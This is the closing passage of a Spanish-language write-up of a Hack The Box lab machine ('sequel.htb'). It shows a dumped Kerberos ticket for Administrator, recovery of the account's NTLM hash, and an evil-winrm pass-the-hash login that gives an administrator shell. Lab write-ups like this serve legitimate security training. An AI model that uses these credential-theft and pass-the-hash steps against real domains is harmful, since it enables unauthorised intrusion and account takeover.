      mGkTQaQj4iyau+TKz5Hrs6uUCG9H8xRwVCb2nqc319IHsBgDNY9HzKuUDiT1ib3W1EGVg4065QT0OwbV
      Tc+Fb1+vexLw5tAtMWiN/joPQBOL7vMJ9xHKoxbNRNWtJyzImm0/v3YwZGoutUzedTRlwBSDn+OIusMj
      SJ4lC2aqetr4wvEOWxg5Dcyt6p3gAXmDTSVlmWgmUdebEWuj28hMgqVJa2wzfSmhMIDwEEzhp7F7UuTm
      ROypWFgQM8Sudk1jO7o5i0BhdF4su5RgAmriv2jSAuRZdJjJZPqs2qwYj0ClnJKD1nCFvR2XycRwLhzY
      U7UQxg5LUDJ2eodOmuJ56gWXK2WTz1XKVsOHHIrAvttefR4cZEpqzcki5llTy1balushkVybM/eFC0c+
      FjbQkHypFzbMgdjnhyBNnnK4PQSki1TMReEFwlAcknpi2bYt5IVRGeIfiW54nqihWHmjBnUq0JUMCNOc
      +3P932/VJWrfFNht5Db9hw86ILk4xCTzh7Zg6BOCQYsHcwYZiVyxTmtNNoELx1g72VTwgWDxVA6LsDBP
      lcw3eQuX0aiLylJIl8mTj4ggQ20ekPv4nRMREley77pjhJotofBDHyXemVbBSTM768eh32eXnLU2vBPJ
      nAaxdEmSktMtUwfrsQelsj7iABbMedDESikvLOqvK3xf94q6ELS2+rKwgW4bv4KD2hRxABFsw9VjZxQB
      U//VEg0kD+b1MTTrow9n4Ns5e6J92MRjrQL4odtkL8U/olla0ArM+k4A+g3Se2DT8g68meXeIxgxsq7m
      Q575CJh2yDgQOatY2NrFq8h1uyPj0yujw8IiPsFuZI0EKRQJrnxQ15MRGoPt+zhJuEkhAOULgWCnkS0E
      kQV1oVF0srITbmWWOviREqh3yFhGEtcH0shARORPfCUJPoWsOb75/uVstF4uQuUDgw1alFgmF0XCqEB9
      ucqS1P37/LVj+dJzUZCyLXYlzAmTGpx9DLAELg/8m/J8IlOHjVEAqi5wED7Cts5SrIGXmxC4B9qtBcWP
      PUSsdexT6ul+z+THHmpW4lwezfCtzV3ObM/K0x/B/NIlArO3oNtbzmo8SxEygq8ODkIQGE5uhxNyA64a
      v5GuItxG0i159gG+iQPw6mCYNkIWGwDyycQRIo4leF8idHejFx2+2BICXdSN4Ia9tgwUOQTxdAHrRVj7
      5v4Bs3Mu/MHd6DV2ryL7eQX+DuVpCrofkfVcrugHImGsT35zbxx92ZmDFPVKZzpwiOVKp5XEucE+v7LS
      av0ZJoZ6Dmcqx47LSeDp2qOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIE
      ENbAKIPMGDLZ7CTGwLWegTShDBsKU0VRVUVMLkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3Kj
      BwMFAADhAAClERgPMjAyMzA4MDMxNTQ0NDdaphEYDzIwMjMwODA0MDE0NDQ3WqcRGA8yMDIzMDgxMDE1
      NDQ0N1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  8/3/2023 8:44:47 AM
  EndTime                  :  8/3/2023 6:44:47 PM
  RenewTill                :  8/10/2023 8:44:47 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  1sAog8wYMtnsJMbAtZ6BNA==
  ASREP (key)              :  27415D6D6D2DB085B6A6BCBC5EFC7A5E

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

ahora con este hash NTLM podemos autenticarnos con evil-winrm como Administrator

1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 10.10.11.202 -u 'Administrator' -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

Y otra máquina Pwneada:D!!

Esta entrada está licenciada bajo CC BY 4.0 por el autor.